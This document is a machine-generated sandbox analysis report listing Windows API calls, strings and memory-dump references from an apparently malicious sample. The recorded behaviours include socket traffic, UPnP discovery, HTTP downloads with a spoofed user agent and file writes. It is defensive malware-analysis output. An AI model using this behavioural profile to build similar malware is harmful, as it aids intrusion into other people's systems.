                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseCreateHandleView$CriticalInitializeMappingSectionSizeUnmap
                                                                    • String ID: .Mw
                                                                    • API String ID: 3956458805-2453323595
                                                                    • Opcode ID: b6454fe67246050de154b4b2d7b685814819646854cbf1c4f394f4a459172caa
                                                                    • Instruction ID: 44e1aa5071e985e1939c8a19f3b292d5e35966d71e561f6040ad28af9ac572d1
                                                                    • Opcode Fuzzy Hash: b6454fe67246050de154b4b2d7b685814819646854cbf1c4f394f4a459172caa
                                                                    • Instruction Fuzzy Hash: 4B31FD74E44309EBEB14DBA4CD49BAFBB74EB48700F208569E601772C0D7B96941CF99
                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(00415E30,00000000,0040B8F2,006A0266,?,0040B90E,00000000,0040D0A4,?), ref: 0040606F
                                                                    • memcpy.NTDLL(?,00000000,00000100), ref: 00406101
                                                                    • CreateFileW.KERNEL32(00416060,40000000,00000000,00000000,00000002,00000002,00000000), ref: 00406225
                                                                    • WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 00406287
                                                                    • FlushFileBuffers.KERNEL32(000000FF), ref: 00406293
                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040629D
                                                                    • LeaveCriticalSection.KERNEL32(00415E30,?,?,?,?,?,?,0040B90E,00000000,0040D0A4,?), ref: 004062A8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: File$CriticalSection$BuffersCloseCreateEnterFlushHandleLeaveWritememcpy
                                                                    • String ID: .Mw
                                                                    • API String ID: 1457358591-2453323595
                                                                    APIs
                                                                    • InterlockedExchange.KERNEL32(?,00000000), ref: 00401D86
                                                                    • InterlockedDecrement.KERNEL32(?), ref: 00401DB0
                                                                    • InterlockedDecrement.KERNEL32(?), ref: 00401DC3
                                                                    • InterlockedExchangeAdd.KERNEL32(?,?), ref: 00401DD4
                                                                    • InterlockedDecrement.KERNEL32(?), ref: 00401E5B
                                                                    • InterlockedDecrement.KERNEL32(?), ref: 00401EF6
                                                                    • setsockopt.WS2_32 ref: 00401F2C
                                                                    • closesocket.WS2_32(?), ref: 00401F39
                                                                      • Part of subcall function 0040D4A0: NtQuerySystemTime.NTDLL(0040B3B5), ref: 0040D4AA
                                                                      • Part of subcall function 0040D4A0: RtlTimeToSecondsSince1980.NTDLL(0040B3B5,?), ref: 0040D4B8
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: Interlocked$Decrement$ExchangeTime$QuerySecondsSince1980Systemclosesocketsetsockopt
                                                                    • String ID:
                                                                    • API String ID: 671207744-0
                                                                    APIs
                                                                    • recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040D8DE
                                                                    • Sleep.KERNEL32(000003E8), ref: 0040D8EE
                                                                    • StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040D90B
                                                                    • StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040D921
                                                                    • StrChrA.SHLWAPI(?,0000000D), ref: 0040D94E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: Sleeprecvfrom
                                                                    • String ID: HTTP/1.1 200 OK$LOCATION:
                                                                    • API String ID: 668330359-3973262388
                                                                    APIs
                                                                    • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000001,00000000,00000000,00000000), ref: 0040EA47
                                                                    • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040EA66
                                                                    • HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040EA8F
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040EAB8
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040EAC2
                                                                    • Sleep.KERNEL32(000003E8), ref: 0040EACD
                                                                    Strings
                                                                    • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36, xrefs: 0040EA42
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$CloseHandleOpen$HttpInfoQuerySleep
                                                                    • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                    • API String ID: 2743515581-2960703779
                                                                    APIs
                                                                    • lstrcmpiW.KERNEL32(00000000,device), ref: 0040E2FC
                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E34B
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E35F
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E377
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: FreeStringlstrcmpi
                                                                    • String ID: device$deviceType
                                                                    • API String ID: 1602765415-3511266565
                                                                    APIs
                                                                    • lstrcmpiW.KERNEL32(00000000,service), ref: 0040E19C
                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E1EB
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E1FF
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E217
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: FreeStringlstrcmpi
                                                                    • String ID: service$serviceType
                                                                    • API String ID: 1602765415-3667235276
                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,?,004019BB,00000000), ref: 004022DA
                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,004019BB,00000000), ref: 004022FE
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterLeave
                                                                    • String ID:
                                                                    • API String ID: 3168844106-0
                                                                    APIs
                                                                    • lstrcmpiW.KERNEL32(00000000,device), ref: 0040E2FC
                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E34B
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E35F
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E377
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: FreeStringlstrcmpi
                                                                    • String ID: device$deviceType
                                                                    • API String ID: 1602765415-3511266565
                                                                    APIs
                                                                    • lstrcmpiW.KERNEL32(00000000,service), ref: 0040E19C
                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E1EB
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E1FF
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E217
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: FreeStringlstrcmpi
                                                                    • String ID: service$serviceType
                                                                    • API String ID: 1602765415-3667235276
                                                                    APIs
                                                                    • CreateFileW.KERNEL32(00416478,40000000,00000000,00000000,00000002,00000002,00000000), ref: 0040AC18
                                                                    • WriteFile.KERNEL32(000000FF,00000000,?,?,00000000), ref: 0040AC39
                                                                    • FlushFileBuffers.KERNEL32(000000FF), ref: 0040AC43
                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040AC4D
                                                                    • InterlockedExchange.KERNEL32(00415260,0000003D), ref: 0040AC5A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: File$BuffersCloseCreateExchangeFlushHandleInterlockedWrite
                                                                    • String ID: .Mw
                                                                    • API String ID: 442028454-2453323595
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: Sleep$CacheDeleteEntrywsprintf
                                                                    • String ID: %s%s
                                                                    • API String ID: 1447977647-3252725368
                                                                    APIs
                                                                    • GetLogicalDrives.KERNEL32 ref: 004063A6
                                                                    • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 004063F4
                                                                    • RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00406421
                                                                    • RegCloseKey.ADVAPI32(?), ref: 0040643E
                                                                    Strings
                                                                    • NoDrives, xrefs: 00406418
                                                                    • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 004063E7
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: CloseDrivesLogicalOpenQueryValue
                                                                    • String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
                                                                    • API String ID: 2666887985-3471754645
                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040D184
                                                                      • Part of subcall function 0040D250: WaitForSingleObject.KERNEL32(?,00000000), ref: 0040D290
                                                                      • Part of subcall function 0040D250: CloseHandle.KERNEL32(?), ref: 0040D2A9
                                                                    • CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040D1DF
                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040D21C
                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040D227
                                                                    • DuplicateHandle.KERNEL32(00000000), ref: 0040D22E
                                                                    • LeaveCriticalSection.KERNEL32(-00000004), ref: 0040D242
                                                                    Similarity
                                                                    • API ID: CriticalCurrentHandleProcessSection$CloseCreateDuplicateEnterLeaveObjectSingleThreadWait
                                                                    • String ID:
                                                                    • API String ID: 2251373460-0
                                                                    APIs
                                                                    Similarity
                                                                    • API ID: Sleep$CountTickrandsrand
                                                                    • String ID:
                                                                    • API String ID: 3488799664-0
                                                                    APIs
                                                                    Similarity
                                                                    • API ID: _allshl_aullshr
                                                                    • String ID:
                                                                    • API String ID: 673498613-0
                                                                    APIs
                                                                    • memcpy.NTDLL(00000004,00000000,?,?), ref: 00401258
                                                                    • htons.WS2_32(?), ref: 00401281
                                                                    • sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 004012A9
                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004012BE
                                                                    Similarity
                                                                    • API ID: ExchangeInterlockedhtonsmemcpysendto
                                                                    • String ID: pdu
                                                                    • API String ID: 2164660128-2320407122
                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(?), ref: 0040D429
                                                                    • CloseHandle.KERNEL32(?), ref: 0040D458
                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0040D467
                                                                    • DeleteCriticalSection.KERNEL32(?), ref: 0040D474
                                                                    Similarity
                                                                    • API ID: CriticalSection$CloseDeleteEnterHandleLeave
                                                                    • String ID: .Mw
                                                                    • API String ID: 3102160386-2453323595
                                                                    APIs
                                                                    • SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401346
                                                                    • WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401352
                                                                    • CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 0040135C
                                                                      • Part of subcall function 0040A1B0: HeapFree.KERNEL32(?,00000000,00402612,?,00402612,?), ref: 0040A20B
                                                                    Similarity
                                                                    • API ID: CloseEventFreeHandleHeapObjectSingleWait
                                                                    • String ID: pdu$.Mw
                                                                    • API String ID: 309973729-3908477397
                                                                    APIs
                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401846
                                                                    • InterlockedDecrement.KERNEL32(?), ref: 004018B1
                                                                      • Part of subcall function 004017A0: EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                                                      • Part of subcall function 004017A0: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                                                      • Part of subcall function 004017A0: LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                                                    Similarity
                                                                    • API ID: Interlocked$CriticalExchangeSection$DecrementEnterLeave
                                                                    • String ID:
                                                                    • API String ID: 3966618661-0
                                                                    APIs
                                                                    Similarity
                                                                    • API ID: _allshl
                                                                    • String ID:
                                                                    • API String ID: 435966717-0
                                                                    APIs
                                                                    • GetDriveTypeW.KERNEL32(004062FF), ref: 0040632D
                                                                    • QueryDosDeviceW.KERNEL32(004062FF,?,00000208), ref: 0040636C
                                                                    • StrCmpNW.SHLWAPI(?,\??\,00000004), ref: 00406384
                                                                    Similarity
                                                                    • API ID: DeviceDriveQueryType
                                                                    • String ID: \??\
                                                                    • API String ID: 1681518211-3047946824
                                                                    APIs
                                                                    • memcpy.NTDLL(00000000,?,?), ref: 00407338
                                                                    • CreateThread.KERNEL32(00000000,00000000,00407370,00000000,00000000,00000000), ref: 0040735A
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00407361
                                                                    Similarity
                                                                    • API ID: CloseCreateHandleThreadmemcpy
                                                                    • String ID: .Mw
                                                                    • API String ID: 2064604595-2453323595
                                                                    APIs
                                                                    • CreateFileW.KERNEL32(00406BF0,80000000,00000001,00000000,00000003,00000000,00000000,00406BF0), ref: 0040E790
                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040E7A5
                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040E7B2
                                                                    Similarity
                                                                    • API ID: File$CloseCreateHandleSize
                                                                    • String ID: .Mw
                                                                    • API String ID: 1378416451-2453323595
                                                                    APIs
                                                                    • ioctlsocket.WS2_32 ref: 0040112B
                                                                    • recvfrom.WS2_32 ref: 0040119C
                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004011B2
                                                                    • WaitForSingleObject.KERNEL32(?,00000001), ref: 004011D3
                                                                    Similarity
                                                                    • API ID: ExchangeInterlockedObjectSingleWaitioctlsocketrecvfrom
                                                                    • String ID:
                                                                    • API String ID: 3980219359-0
                                                                    APIs
                                                                    • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401F83
                                                                    • WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 00401FAF
                                                                    • WSAGetLastError.WS2_32 ref: 00401FB9
                                                                    • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401FF9
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: CompletionQueuedStatus$ErrorLastOverlappedResult
                                                                    • String ID:
                                                                    • API String ID: 2074799992-0
                                                                    APIs
                                                                    • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401C88
                                                                    • WSAGetLastError.WS2_32(?,?,004021A5,00000000), ref: 00401C90
                                                                    • Sleep.KERNEL32(00000001,?,?,004021A5,00000000), ref: 00401CA6
                                                                    • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401CCC
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: Recv$ErrorLastSleep
                                                                    • String ID:
                                                                    • API String ID: 3668019968-0
                                                                    APIs
                                                                    • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B0C
                                                                    • WSAGetLastError.WS2_32 ref: 00401B12
                                                                    • Sleep.KERNEL32(00000001), ref: 00401B28
                                                                    • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B4A
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: Send$ErrorLastSleep
                                                                    • String ID:
                                                                    • API String ID: 2121970615-0
                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 00401808
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                    • String ID:
                                                                    • API String ID: 2223660684-0
                                                                    APIs
                                                                    • CoInitializeEx.OLE32(00000000,00000002,?,?,00407A2A), ref: 00406FE8
                                                                    • SysAllocString.OLEAUT32(00416268), ref: 00406FF3
                                                                    • CoUninitialize.OLE32 ref: 00407018
                                                                      • Part of subcall function 00407030: SysFreeString.OLEAUT32(00000000), ref: 00407248
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00407012
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: String$Free$AllocInitializeUninitialize
                                                                    • String ID:
                                                                    • API String ID: 459949847-0
                                                                    APIs
                                                                      • Part of subcall function 004072C0: CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 004072E0
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00407248
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFreeInstanceString
                                                                    • String ID: Microsoft Corporation
                                                                    • API String ID: 586785272-3838278685
                                                                    APIs
                                                                      • Part of subcall function 0040DBC0: memset.NTDLL ref: 0040DBE8
                                                                      • Part of subcall function 0040DBC0: InternetCrackUrlA.WININET(0040D699,00000000,10000000,0000003C), ref: 0040DC38
                                                                      • Part of subcall function 0040DBC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040DC48
                                                                      • Part of subcall function 0040DBC0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040DC81
                                                                      • Part of subcall function 0040DBC0: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040DCB7
                                                                      • Part of subcall function 0040DBC0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040DCDF
                                                                      • Part of subcall function 0040DBC0: InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040DD28
                                                                      • Part of subcall function 0040DBC0: InternetCloseHandle.WININET(00000000), ref: 0040DDB7
                                                                      • Part of subcall function 0040DAB0: SysAllocString.OLEAUT32(00000000), ref: 0040DADE
                                                                      • Part of subcall function 0040DAB0: CoCreateInstance.OLE32(00412408,00000000,00004401,004123F8,00000000), ref: 0040DB06
                                                                      • Part of subcall function 0040DAB0: SysFreeString.OLEAUT32(00000000), ref: 0040DBA1
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040DA5B
                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040DA65
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$String$Free$HttpOpenRequest$AllocCloseConnectCrackCreateFileHandleInstanceReadSendmemset
                                                                    • String ID: %S%S
                                                                    • API String ID: 1017111014-3267608656
                                                                    APIs
                                                                    • CoInitializeEx.OLE32(00000000,00000002,?,?,?,00407A25), ref: 0040D64A
                                                                      • Part of subcall function 0040D710: socket.WS2_32(00000002,00000002,00000011), ref: 0040D72A
                                                                      • Part of subcall function 0040D710: htons.WS2_32(0000076C), ref: 0040D760
                                                                      • Part of subcall function 0040D710: inet_addr.WS2_32(239.255.255.250), ref: 0040D76F
